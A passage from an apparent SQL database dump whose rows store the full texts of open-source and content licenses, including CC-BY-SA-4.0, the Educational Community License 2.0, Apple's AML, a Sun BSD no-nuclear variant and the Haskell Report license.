license\nrights hereunder and to permit the lawful exercise of the rights granted hereunder\nwithout You having any obligation to pay any royalties, compulsory license\nfees, residuals or any other payments;\n\nii. The Work does not infringe the copyright, trademark, publicity rights,\ncommon law rights or any other right of any third party or constitute defamation,\ninvasion of privacy or other tortious injury to any third party.\n\nb. EXCEPT AS EXPRESSLY STATED IN THIS LICENSE OR OTHERWISE AGREED IN WRITING\nOR REQUIRED BY APPLICABLE LAW, THE WORK IS LICENSED ON AN \"AS IS\" BASIS, WITHOUT\nWARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED INCLUDING, WITHOUT LIMITATION,\nANY WARRANTIES REGARDING THE CONTENTS OR ACCURACY OF THE WORK.\n\n6. Limitation on Liability. EXCEPT TO THE EXTENT REQUIRED BY APPLICABLE LAW,\nAND EXCEPT FOR DAMAGES ARISING FROM LIABILITY TO A THIRD PARTY RESULTING FROM\nBREACH OF THE WARRANTIES IN SECTION 5, IN NO EVENT WILL LICENSOR BE LIABLE\nTO YOU ON ANY LEGAL THEORY FOR ANY SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE\nOR EXEMPLARY DAMAGES ARISING OUT OF THIS LICENSE OR THE USE OF THE WORK, EVEN\nIF LICENSOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 7. Termination\n\na. This License and the rights granted hereunder will terminate automatically\nupon any breach by You of the terms of this License. Individuals or entities\nwho have received Derivative Works or Collective Works from You under this\nLicense, however, will not have their licenses terminated provided such individuals\nor entities remain in full compliance with those licenses. Sections 1, 2,\n5, 6, 7, and 8 will survive any termination of this License.\n\nb. Subject to the above terms and conditions, the license granted here is\nperpetual (for the duration of the applicable copyright in the Work). Notwithstanding\nthe above, Licensor reserves the right to release the Work under different\nlicense terms or to stop distributing the Work at any time; provided, however\nthat any such election will not serve to withdraw this License (or any other\nlicense that has been, or is required to be, granted under the terms of this\nLicense), and this License will continue in full force and effect unless terminated\nas stated above.\n\n 8. Miscellaneous\n\na. Each time You distribute or publicly digitally perform the Work or a Collective\nWork, the Licensor offers to the recipient a license to the Work on the same\nterms and conditions as the license granted to You under this License.\n\nb. Each time You distribute or publicly digitally perform a Derivative Work,\nLicensor offers to the recipient a license to the original Work on the same\nterms and conditions as the license granted to You under this License.\n\nc. If any provision of this License is invalid or unenforceable under applicable\nlaw, it shall not affect the validity or enforceability of the remainder of\nthe terms of this License, and without further action by the parties to this\nagreement, such provision shall be reformed to the minimum extent necessary\nto make such provision valid and enforceable.\n\nd. No term or provision of this License shall be deemed waived and no breach\nconsented to unless such waiver or consent shall be in writing and signed\nby the party to be charged with such waiver or consent.\n\ne. This License constitutes the entire agreement between the parties with\nrespect to the Work licensed here. There are no understandings, agreements\nor representations with respect to the Work not specified here. Licensor shall\nnot be bound by any additional provisions that may appear in any communication\nfrom You. This License may not be modified without the mutual written agreement\nof the Licensor and You.\n\nCreative Commons is not a party to this License, and makes no warranty whatsoever\nin connection with the Work. Creative Commons will not be liable to You or\nany party on any legal theory for any damages whatsoever, including without\nlimitation any general, special, incidental or consequential damages arising\nin connection to this license. Notwithstanding the foregoing two (2) sentences,\nif Creative Commons has expressly identified itself as the Licensor hereunder,\nit shall have all rights and obligations of Licensor.\n\nExcept for the limited purpose of indicating to the public that the Work is\nlicensed under the CCPL, neither party will use the trademark \"Creative Commons\"\nor any related trademark or logo of Creative Commons without the prior written\nconsent of Creative Commons. Any permitted use will be in compliance with\nCreative Commons\' then-current trademark usage guidelines, as may be published\non its website or otherwise made available upon request from time to time.\n\nCreative Commons may be contacted at http://creativecommons.org/.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(299,'AML','Copyright: Copyright (c) 2006 by Apple Computer, Inc., All Rights Reserved.\n\nIMPORTANT: This Apple software is supplied to you by Apple Computer, Inc.\n(\"Apple\") in consideration of your agreement to the following terms, and your\nuse, installation, modification or redistribution of this Apple software constitutes\nacceptance of these terms. If you do not agree with these terms, please do\nnot use, install, modify or redistribute this Apple software.\n\nIn consideration of your agreement to abide by the following terms, and subject\nto these terms, Apple grants you a personal, non-exclusive license, under\nApple\'s copyrights in this original Apple software (the \"Apple Software\"),\nto use, reproduce, modify and redistribute the Apple Software, with or without\nmodifications, in source and/or binary forms; provided that if you redistribute\nthe Apple Software in its entirety and without modifications, you must retain\nthis notice and the following text and disclaimers in all such redistributions\nof the Apple Software. Neither the name, trademarks, service marks or logos\nof Apple Computer, Inc. may be used to endorse or promote products derived\nfrom the Apple Software without specific prior written permission from Apple.\nExcept as expressly stated in this notice, no other rights or licenses, express\nor implied, are granted by Apple herein, including but not limited to any\npatent rights that may be infringed by your derivative works or by other works\nin which the Apple Software may be incorporated.\n\nThe Apple Software is provided by Apple on an \"AS IS\" basis. APPLE MAKES NO\nWARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION THE IMPLIED WARRANTIES\nOF NON-INFRINGEMENT, MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE,\nREGARDING THE APPLE SOFTWARE OR ITS USE AND OPERATION ALONE OR IN COMBINATION\nWITH YOUR PRODUCTS.\n\nIN NO EVENT SHALL APPLE BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL OR\nCONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE\nGOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\nARISING IN ANY WAY OUT OF THE USE, REPRODUCTION, MODIFICATION AND/OR DISTRIBUTION\nOF THE APPLE SOFTWARE, HOWEVER CAUSED AND WHETHER UNDER THEORY OF CONTRACT,\nTORT (INCLUDING NEGLIGENCE), STRICT LIABILITY OR OTHERWISE, EVEN IF APPLE\nHAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(300,'ECL-2.0','Educational Community License\n\nVersion 2.0, April 2007 http://www.osedu.org/licenses/\n\nThe Educational Community License version 2.0 (\"ECL\") consists of the Apache\n2.0 license, modified to change the scope of the patent grant in section 3\nto be specific to the needs of the education communities using this license.\nThe original Apache 2.0 license can be found at: http://www.apache.org/licenses/LICENSE-2.0\n\nTERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\n 1. Definitions.\n\n \n\n\"License\" shall mean the terms and conditions for use, reproduction, and distribution\nas defined by Sections 1 through 9 of this document.\n\n \n\n\"Licensor\" shall mean the copyright owner or entity authorized by the copyright\nowner that is granting the License.\n\n \n\n\"Legal Entity\" shall mean the union of the acting entity and all other entities\nthat control, are controlled by, or are under common control with that entity.\nFor the purposes of this definition, \"control\" means (i) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (ii) ownership of fifty percent (50%) or more\nof the outstanding shares, or (iii) beneficial ownership of such entity.\n\n \n\n\"You\" (or \"Your\") shall mean an individual or Legal Entity exercising permissions\ngranted by this License.\n\n \n\n\"Source\" form shall mean the preferred form for making modifications, including\nbut not limited to software source code, documentation source, and configuration\nfiles.\n\n \n\n\"Object\" form shall mean any form resulting from mechanical transformation\nor translation of a Source form, including but not limited to compiled object\ncode, generated documentation, and conversions to other media types.\n\n \n\n\"Work\" shall mean the work of authorship, whether in Source or Object form,\nmade available under the License, as indicated by a copyright notice that\nis included in or attached to the work (an example is provided in the Appendix\nbelow).\n\n \n\n\"Derivative Works\" shall mean any work, whether in Source or Object form,\nthat is based on (or derived from) the Work and for which the editorial revisions,\nannotations, elaborations, or other modifications represent, as a whole, an\noriginal work of authorship. For the purposes of this License, Derivative\nWorks shall not include works that remain separable from, or merely link (or\nbind by name) to the interfaces of, the Work and Derivative Works thereof.\n\n \n\n\"Contribution\" shall mean any work of authorship, including the original version\nof the Work and any modifications or additions to that Work or Derivative\nWorks thereof, that is intentionally submitted to Licensor for inclusion in\nthe Work by the copyright owner or by an individual or Legal Entity authorized\nto submit on behalf of the copyright owner. For the purposes of this definition,\n\"submitted\" means any form of electronic, verbal, or written communication\nsent to the Licensor or its representatives, including but not limited to\ncommunication on electronic mailing lists, source code control systems, and\nissue tracking systems that are managed by, or on behalf of, the Licensor\nfor the purpose of discussing and improving the Work, but excluding communication\nthat is conspicuously marked or otherwise designated in writing by the copyright\nowner as \"Not a Contribution.\"\n\n \n\n\"Contributor\" shall mean Licensor and any individual or Legal Entity on behalf\nof whom a Contribution has been received by Licensor and subsequently incorporated\nwithin the Work.\n\n 2. Grant of Copyright License.\n\nSubject to the terms and conditions of this License, each Contributor hereby\ngrants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,\nirrevocable copyright license to reproduce, prepare Derivative Works of, publicly\ndisplay, publicly perform, sublicense, and distribute the Work and such Derivative\nWorks in Source or Object form.\n\n 3. Grant of Patent License.\n\nSubject to the terms and conditions of this License, each Contributor hereby\ngrants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,\nirrevocable (except as stated in this section) patent license to make, have\nmade, use, offer to sell, sell, import, and otherwise transfer the Work, where\nsuch license applies only to those patent claims licensable by such Contributor\nthat are necessarily infringed by their Contribution(s) alone or by combination\nof their Contribution(s) with the Work to which such Contribution(s) was submitted.\nIf You institute patent litigation against any entity (including a cross-claim\nor counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated\nwithin the Work constitutes direct or contributory patent infringement, then\nany patent licenses granted to You under this License for that Work shall\nterminate as of the date such litigation is filed. Any patent license granted\nhereby with respect to contributions by an individual employed by an institution\nor organization is limited to patent claims where the individual that is the\nauthor of the Work is also the inventor of the patent claims licensed, and\nwhere the organization or institution has the right to grant such license\nunder applicable grant and research funding agreements. No other express or\nimplied licenses are granted.\n\n 4. Redistribution.\n\nYou may reproduce and distribute copies of the Work or Derivative Works thereof\nin any medium, with or without modifications, and in Source or Object form,\nprovided that You meet the following conditions:\n\na. You must give any other recipients of the Work or Derivative Works a copy\nof this License; and\n\nb. You must cause any modified files to carry prominent notices stating that\nYou changed the files; and\n\nc. You must retain, in the Source form of any Derivative Works that You distribute,\nall copyright, patent, trademark, and attribution notices from the Source\nform of the Work, excluding those notices that do not pertain to any part\nof the Derivative Works; and\n\nd. If the Work includes a \"NOTICE\" text file as part of its distribution,\nthen any Derivative Works that You distribute must include a readable copy\nof the attribution notices contained within such NOTICE file, excluding those\nnotices that do not pertain to any part of the Derivative Works, in at least\none of the following places: within a NOTICE text file distributed as part\nof the Derivative Works; within the Source form or documentation, if provided\nalong with the Derivative Works; or, within a display generated by the Derivative\nWorks, if and wherever such third-party notices normally appear. The contents\nof the NOTICE file are for informational purposes only and do not modify the\nLicense. You may add Your own attribution notices within Derivative Works\nthat You distribute, alongside or as an addendum to the NOTICE text from the\nWork, provided that such additional attribution notices cannot be construed\nas modifying the License.\n\nYou may add Your own copyright statement to Your modifications and may provide\nadditional or different license terms and conditions for use, reproduction,\nor distribution of Your modifications, or for any such Derivative Works as\na whole, provided Your use, reproduction, and distribution of the Work otherwise\ncomplies with the conditions stated in this License.\n\n 5. Submission of Contributions.\n\nUnless You explicitly state otherwise, any Contribution intentionally submitted\nfor inclusion in the Work by You to the Licensor shall be under the terms\nand conditions of this License, without any additional terms or conditions.\nNotwithstanding the above, nothing herein shall supersede or modify the terms\nof any separate license agreement you may have executed with Licensor regarding\nsuch Contributions.\n\n 6. Trademarks.\n\nThis License does not grant permission to use the trade names, trademarks,\nservice marks, or product names of the Licensor, except as required for reasonable\nand customary use in describing the origin of the Work and reproducing the\ncontent of the NOTICE file.\n\n 7. Disclaimer of Warranty.\n\nUnless required by applicable law or agreed to in writing, Licensor provides\nthe Work (and each Contributor provides its Contributions) on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including,\nwithout limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT,\nMERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible\nfor determining the appropriateness of using or redistributing the Work and\nassume any risks associated with Your exercise of permissions under this License.\n\n 8. Limitation of Liability.\n\nIn no event and under no legal theory, whether in tort (including negligence),\ncontract, or otherwise, unless required by applicable law (such as deliberate\nand grossly negligent acts) or agreed to in writing, shall any Contributor\nbe liable to You for damages, including any direct, indirect, special, incidental,\nor consequential damages of any character arising as a result of this License\nor out of the use or inability to use the Work (including but not limited\nto damages for loss of goodwill, work stoppage, computer failure or malfunction,\nor any and all other commercial damages or losses), even if such Contributor\nhas been advised of the possibility of such damages.\n\n 9. Accepting Warranty or Additional Liability.\n\nWhile redistributing the Work or Derivative Works thereof, You may choose\nto offer, and charge a fee for, acceptance of support, warranty, indemnity,\nor other liability obligations and/or rights consistent with this License.\nHowever, in accepting such obligations, You may act only on Your own behalf\nand on Your sole responsibility, not on behalf of any other Contributor, and\nonly if You agree to indemnify, defend, and hold each Contributor harmless\nfor any liability incurred by, or claims asserted against, such Contributor\nby reason of your accepting any such warranty or additional liability. END\nOF TERMS AND CONDITIONS\n\nAPPENDIX: How to apply the Educational Community License to your work\n\nTo apply the Educational Community License to your work, attach\n\nthe following boilerplate notice, with the fields enclosed by\n\nbrackets \"[]\" replaced with your own identifying information.\n\n(Don\'t include the brackets!) The text should be enclosed in the\n\nappropriate comment syntax for the file format. We also recommend\n\nthat a file or class name and description of purpose be included on\n\nthe same \"printed page\" as the copyright notice for easier\n\nidentification within third-party archives.\n\nCopyright [yyyy] [name of copyright owner] Licensed under the\n\nEducational Community License, Version 2.0 (the \"License\"); you may\n\nnot use this file except in compliance with the License. You may\n\nobtain a copy of the License at\n\nhttp://www.osedu.org/licenses/ECL-2.0\n\nUnless required by applicable law or agreed to in writing,\n\nsoftware distributed under the License is distributed on an \"AS IS\"\n\nBASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n\nor implied. See the License for the specific language governing\n\npermissions and limitations under the License.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(301,'CC-BY-SA-4.0','Creative Commons Attribution-ShareAlike 4.0 International Creative Commons\nCorporation (\"Creative Commons\") is not a law firm and does not provide legal\nservices or legal advice. Distribution of Creative Commons public licenses\ndoes not create a lawyer-client or other relationship. Creative Commons makes\nits licenses and related information available on an \"as-is\" basis. Creative\nCommons gives no warranties regarding its licenses, any material licensed\nunder their terms and conditions, or any related information. Creative Commons\ndisclaims all liability for damages resulting from their use to the fullest\nextent possible.\n\nUsing Creative Commons Public Licenses\n\nCreative Commons public licenses provide a standard set of terms and conditions\nthat creators and other rights holders may use to share original works of\nauthorship and other material subject to copyright and certain other rights\nspecified in the public license below. The following considerations are for\ninformational purposes only, are not exhaustive, and do not form part of our\nlicenses.\n\nConsiderations for licensors: Our public licenses are intended for use by\nthose authorized to give the public permission to use material in ways otherwise\nrestricted by copyright and certain other rights. Our licenses are irrevocable.\nLicensors should read and understand the terms and conditions of the license\nthey choose before applying it. Licensors should also secure all rights necessary\nbefore applying our licenses so that the public can reuse the material as\nexpected. Licensors should clearly mark any material not subject to the license.\nThis includes other CC-licensed material, or material used under an exception\nor limitation to copyright. More considerations for licensors : wiki.creativecommons.org/Considerations_for_licensors\n\nConsiderations for the public: By using one of our public licenses, a licensor\ngrants the public permission to use the licensed material under specified\nterms and conditions. If the licensor\'s permission is not necessary for any\nreason–for example, because of any applicable exception or limitation to copyright–then\nthat use is not regulated by the license. Our licenses grant only permissions\nunder copyright and certain other rights that a licensor has authority to\ngrant. Use of the licensed material may still be restricted for other reasons,\nincluding because others have copyright or other rights in the material. A\nlicensor may make special requests, such as asking that all changes be marked\nor described.\n\nAlthough not required by our licenses, you are encouraged to respect those\nrequests where reasonable. More considerations for the public : wiki.creativecommons.org/Considerations_for_licensees\n\nCreative Commons Attribution-ShareAlike 4.0 International Public License\n\nBy exercising the Licensed Rights (defined below), You accept and agree to\nbe bound by the terms and conditions of this Creative Commons Attribution-ShareAlike\n4.0 International Public License (\"Public License\"). To the extent this Public\nLicense may be interpreted as a contract, You are granted the Licensed Rights\nin consideration of Your acceptance of these terms and conditions, and the\nLicensor grants You such rights in consideration of benefits the Licensor\nreceives from making the Licensed Material available under these terms and\nconditions.\n\nSection 1 – Definitions.\n\na. Adapted Material means material subject to Copyright and Similar Rights\nthat is derived from or based upon the Licensed Material and in which the\nLicensed Material is translated, altered, arranged, transformed, or otherwise\nmodified in a manner requiring permission under the Copyright and Similar\nRights held by the Licensor. For purposes of this Public License, where the\nLicensed Material is a musical work, performance, or sound recording, Adapted\nMaterial is always produced where the Licensed Material is synched in timed\nrelation with a moving image.\n\nb. Adapter\'s License means the license You apply to Your Copyright and Similar\nRights in Your contributions to Adapted Material in accordance with the terms\nand conditions of this Public License.\n\nc. BY-SA Compatible License means a license listed at creativecommons.org/compatiblelicenses,\napproved by Creative Commons as essentially the equivalent of this Public\nLicense.\n\nd. Copyright and Similar Rights means copyright and/or similar rights closely\nrelated to copyright including, without limitation, performance, broadcast,\nsound recording, and Sui Generis Database Rights, without regard to how the\nrights are labeled or categorized. For purposes of this Public License, the\nrights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights.\n\ne. Effective Technological Measures means those measures that, in the absence\nof proper authority, may not be circumvented under laws fulfilling obligations\nunder Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996,\nand/or similar international agreements.\n\nf. Exceptions and Limitations means fair use, fair dealing, and/or any other\nexception or limitation to Copyright and Similar Rights that applies to Your\nuse of the Licensed Material.\n\ng. License Elements means the license attributes listed in the name of a Creative\nCommons Public License. The License Elements of this Public License are Attribution\nand ShareAlike.\n\nh. Licensed Material means the artistic or literary work, database, or other\nmaterial to which the Licensor applied this Public License.\n\ni. Licensed Rights means the rights granted to You subject to the terms and\nconditions of this Public License, which are limited to all Copyright and\nSimilar Rights that apply to Your use of the Licensed Material and that the\nLicensor has authority to license.\n\nj. Licensor means the individual(s) or entity(ies) granting rights under this\nPublic License.\n\nk. Share means to provide material to the public by any means or process that\nrequires permission under the Licensed Rights, such as reproduction, public\ndisplay, public performance, distribution, dissemination, communication, or\nimportation, and to make material available to the public including in ways\nthat members of the public may access the material from a place and at a time\nindividually chosen by them.\n\nl. Sui Generis Database Rights means rights other than copyright resulting\nfrom Directive 96/9/EC of the European Parliament and of the Council of 11\nMarch 1996 on the legal protection of databases, as amended and/or succeeded,\nas well as other essentially equivalent rights anywhere in the world.\n\nm. You means the individual or entity exercising the Licensed Rights under\nthis Public License. Your has a corresponding meaning.\n\nSection 2 – Scope.\n\n a. License grant.\n\n1. Subject to the terms and conditions of this Public License, the Licensor\nhereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive,\nirrevocable license to exercise the Licensed Rights in the Licensed Material\nto:\n\n A. reproduce and Share the Licensed Material, in whole or in part; and\n\n B. produce, reproduce, and Share Adapted Material.\n\n2. Exceptions and Limitations. For the avoidance of doubt, where Exceptions\nand Limitations apply to Your use, this Public License does not apply, and\nYou do not need to comply with its terms and conditions.\n\n 3. Term. The term of this Public License is specified in Section 6(a).\n\n4. Media and formats; technical modifications allowed. The Licensor authorizes\nYou to exercise the Licensed Rights in all media and formats whether now known\nor hereafter created, and to make technical modifications necessary to do\nso. The Licensor waives and/or agrees not to assert any right or authority\nto forbid You from making technical modifications necessary to exercise the\nLicensed Rights, including technical modifications necessary to circumvent\nEffective Technological Measures. For purposes of this Public License, simply\nmaking modifications authorized by this Section 2(a)(4) never produces Adapted\nMaterial.\n\n 5. Downstream recipients.\n\nA. Offer from the Licensor – Licensed Material. Every recipient of the Licensed\nMaterial automatically receives an offer from the Licensor to exercise the\nLicensed Rights under the terms and conditions of this Public License.\n\nB. Additional offer from the Licensor – Adapted Material. Every recipient\nof Adapted Material from You automatically receives an offer from the Licensor\nto exercise the Licensed Rights in the Adapted Material under the conditions\nof the Adapter\'s License You apply.\n\nC. No downstream restrictions. You may not offer or impose any additional\nor different terms or conditions on, or apply any Effective Technological\nMeasures to, the Licensed Material if doing so restricts exercise of the Licensed\nRights by any recipient of the Licensed Material.\n\n6. No endorsement. Nothing in this Public License constitutes or may be construed\nas permission to assert or imply that You are, or that Your use of the Licensed\nMaterial is, connected with, or sponsored, endorsed, or granted official status\nby, the Licensor or others designated to receive attribution as provided in\nSection 3(a)(1)(A)(i).\n\n b. Other rights.\n\n1. Moral rights, such as the right of integrity, are not licensed under this\nPublic License, nor are publicity, privacy, and/or other similar personality\nrights; however, to the extent possible, the Licensor waives and/or agrees\nnot to assert any such rights held by the Licensor to the limited extent necessary\nto allow You to exercise the Licensed Rights, but not otherwise.\n\n2. Patent and trademark rights are not licensed under this Public License.\n\n3. To the extent possible, the Licensor waives any right to collect royalties\nfrom You for the exercise of the Licensed Rights, whether directly or through\na collecting society under any voluntary or waivable statutory or compulsory\nlicensing scheme. In all other cases the Licensor expressly reserves any right\nto collect such royalties.\n\nSection 3 – License Conditions.\n\nYour exercise of the Licensed Rights is expressly made subject to the following\nconditions.\n\n a. Attribution.\n\n1. If You Share the Licensed Material (including in modified form), You must:\n\nA. retain the following if it is supplied by the Licensor with the Licensed\nMaterial:\n\ni. identification of the creator(s) of the Licensed Material and any others\ndesignated to receive attribution, in any reasonable manner requested by the\nLicensor (including by pseudonym if designated);\n\n ii. a copyright notice;\n\n iii. a notice that refers to this Public License;\n\n iv. a notice that refers to the disclaimer of warranties;\n\nv. a URI or hyperlink to the Licensed Material to the extent reasonably practicable;\n\nB. indicate if You modified the Licensed Material and retain an indication\nof any previous modifications; and\n\nC. indicate the Licensed Material is licensed under this Public License, and\ninclude the text of, or the URI or hyperlink to, this Public License.\n\n2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner\nbased on the medium, means, and context in which You Share the Licensed Material.\nFor example, it may be reasonable to satisfy the conditions by providing a\nURI or hyperlink to a resource that includes the required information.\n\n3. If requested by the Licensor, You must remove any of the information required\nby Section 3(a)(1)(A) to the extent reasonably practicable.\n\nb. ShareAlike.In addition to the conditions in Section 3(a), if You Share\nAdapted Material You produce, the following conditions also apply.\n\n1. The Adapter\'s License You apply must be a Creative Commons license with\nthe same License Elements, this version or later, or a BY-SA Compatible License.\n\n2. You must include the text of, or the URI or hyperlink to, the Adapter\'s\nLicense You apply. You may satisfy this condition in any reasonable manner\nbased on the medium, means, and context in which You Share Adapted Material.\n\n3. You may not offer or impose any additional or different terms or conditions\non, or apply any Effective Technological Measures to, Adapted Material that\nrestrict exercise of the rights granted under the Adapter\'s License You apply.\n\nSection 4 – Sui Generis Database Rights.\n\nWhere the Licensed Rights include Sui Generis Database Rights that apply to\nYour use of the Licensed Material:\n\na. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract,\nreuse, reproduce, and Share all or a substantial portion of the contents of\nthe database;\n\nb. if You include all or a substantial portion of the database contents in\na database in which You have Sui Generis Database Rights, then the database\nin which You have Sui Generis Database Rights (but not its individual contents)\nis Adapted Material, including for purposes of Section 3(b); and\n\nc. You must comply with the conditions in Section 3(a) if You Share all or\na substantial portion of the contents of the database.\n\nFor the avoidance of doubt, this Section 4 supplements and does not replace\nYour obligations under this Public License where the Licensed Rights include\nother Copyright and Similar Rights.\n\nSection 5 – Disclaimer of Warranties and Limitation of Liability.\n\na. Unless otherwise separately undertaken by the Licensor, to the extent possible,\nthe Licensor offers the Licensed Material as-is and as-available, and makes\nno representations or warranties of any kind concerning the Licensed Material,\nwhether express, implied, statutory, or other. This includes, without limitation,\nwarranties of title, merchantability, fitness for a particular purpose, non-infringement,\nabsence of latent or other defects, accuracy, or the presence or absence of\nerrors, whether or not known or discoverable. Where disclaimers of warranties\nare not allowed in full or in part, this disclaimer may not apply to You.\n\nb. To the extent possible, in no event will the Licensor be liable to You\non any legal theory (including, without limitation, negligence) or otherwise\nfor any direct, special, indirect, incidental, consequential, punitive, exemplary,\nor other losses, costs, expenses, or damages arising out of this Public License\nor use of the Licensed Material, even if the Licensor has been advised of\nthe possibility of such losses, costs, expenses, or damages. Where a limitation\nof liability is not allowed in full or in part, this limitation may not apply\nto You.\n\nc. The disclaimer of warranties and limitation of liability provided above\nshall be interpreted in a manner that, to the extent possible, most closely\napproximates an absolute disclaimer and waiver of all liability.\n\nSection 6 – Term and Termination.\n\na. This Public License applies for the term of the Copyright and Similar Rights\nlicensed here. However, if You fail to comply with this Public License, then\nYour rights under this Public License terminate automatically.\n\nb. Where Your right to use the Licensed Material has terminated under Section\n6(a), it reinstates:\n\n1. automatically as of the date the violation is cured, provided it is cured\nwithin 30 days of Your discovery of the violation; or\n\n 2. upon express reinstatement by the Licensor.\n\nc. For the avoidance of doubt, this Section 6(b) does not affect any right\nthe Licensor may have to seek remedies for Your violations of this Public\nLicense.\n\nd. For the avoidance of doubt, the Licensor may also offer the Licensed Material\nunder separate terms or conditions or stop distributing the Licensed Material\nat any time; however, doing so will not terminate this Public License.\n\n e. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.\n\nSection 7 – Other Terms and Conditions.\n\na. The Licensor shall not be bound by any additional or different terms or\nconditions communicated by You unless expressly agreed.\n\nb. Any arrangements, understandings, or agreements regarding the Licensed\nMaterial not stated herein are separate from and independent of the terms\nand conditions of this Public License.\n\nSection 8 – Interpretation.\n\na. For the avoidance of doubt, this Public License does not, and shall not\nbe interpreted to, reduce, limit, restrict, or impose conditions on any use\nof the Licensed Material that could lawfully be made without permission under\nthis Public License.\n\nb. To the extent possible, if any provision of this Public License is deemed\nunenforceable, it shall be automatically reformed to the minimum extent necessary\nto make it enforceable. If the provision cannot be reformed, it shall be severed\nfrom this Public License without affecting the enforceability of the remaining\nterms and conditions.\n\nc. No term or condition of this Public License will be waived and no failure\nto comply consented to unless expressly agreed to by the Licensor.\n\nd. Nothing in this Public License constitutes or may be interpreted as a limitation\nupon, or waiver of, any privileges and immunities that apply to the Licensor\nor You, including from the legal processes of any jurisdiction or authority.\n\nCreative Commons is not a party to its public licenses. Notwithstanding, Creative\nCommons may elect to apply one of its public licenses to material it publishes\nand in those instances will be considered the \"Licensor.\" The text of the\nCreative Commons public licenses is dedicated to the public domain under the\nCC0 Public Domain Dedication. Except for the limited purpose of indicating\nthat material is shared under a Creative Commons public license or as otherwise\npermitted by the Creative Commons policies published at creativecommons.org/policies,\nCreative Commons does not authorize the use of the trademark \"Creative Commons\"\nor any other trademark or logo of Creative Commons without its prior written\nconsent including, without limitation, in connection with any unauthorized\nmodifications to any of its public licenses or any other arrangements, understandings,\nor agreements concerning use of licensed material. For the avoidance of doubt,\nthis paragraph does not form part of the public licenses.\n\nCreative Commons may be contacted at creativecommons.org.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(302,'BSD-3-Clause-No-Nuclear-License','Copyright 1994-2009 Sun Microsystems, Inc. All Rights Reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistribution of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistribution in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Neither the name of Sun Microsystems, Inc. or the names of contributors\nmay be used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nThis software is provided \"AS IS,\" without a warranty of any kind. ALL EXPRESS\nOR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED\nWARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT,\nARE HEREBY EXCLUDED. SUN MICROSYSTEMS, INC. (\"SUN\") AND ITS LICENSORS SHALL\nNOT BE LIABLE FOR ANY DAMAGES SUFFERED BY LICENSEE AS A RESULT OF USING, MODIFYING\nOR DISTRIBUTING THIS SOFTWARE OR ITS DERIVATIVES. IN NO EVENT WILL SUN OR\nITS LICENSORS BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT,\nINDIRECT, SPECIAL, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES, HOWEVER\nCAUSED AND REGARDLESS OF THE THEORY OF LIABILITY, ARISING OUT OF THE USE OF\nOR INABILITY TO USE THIS SOFTWARE, EVEN IF SUN HAS BEEN ADVISED OF THE POSSIBILITY\nOF SUCH DAMAGES.\n\nYou acknowledge that this software is not designed, licensed or intended for\nuse in the design, construction, operation or maintenance of any nuclear facility.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(303,'HaskellReport','Code derived from the document \"Report on the Programming Language\n\nHaskell 2010\", is distributed under the following license:\n\nCopyright (c) 2010 Simon Marlow\n\nThe authors intend this Report to belong to the entire Haskell community,\nand so we grant permission to copy and distribute it for any purpose, provided\nthat it is reproduced in its entirety, including this Notice. Modified versions\nof this Report may also be copied and distributed for any purpose, provided\nthat the modified version is clearly presented as such, and that it does not\nclaim to be a definition of the Haskell 2010 Language.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(304,'BSL-1.0','Boost Software License - Version 1.0 - August 17th, 2003\n\nPermission is hereby granted, free of charge, to any person or organization\nobtaining a copy of the software and accompanying documentation covered by\nthis license (the \"Software\") to use, reproduce, display, distribute, execute,\nand transmit the Software, and to prepare derivative works of the Software,\nand to permit third-parties to whom the Software is furnished to do so, all\nsubject to the following:\n\nThe copyright notices in the Software and this entire statement, including\nthe above license grant, this restriction and the following disclaimer, must\nbe included in all copies of the Software, in whole or in part, and all derivative\nworks of the Software, unless such copies or derivative works are solely in\nthe form of machine-executable object code generated by a source language\nprocessor.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE, TITLE AND NON-INFRINGEMENT. IN NO EVENT SHALL 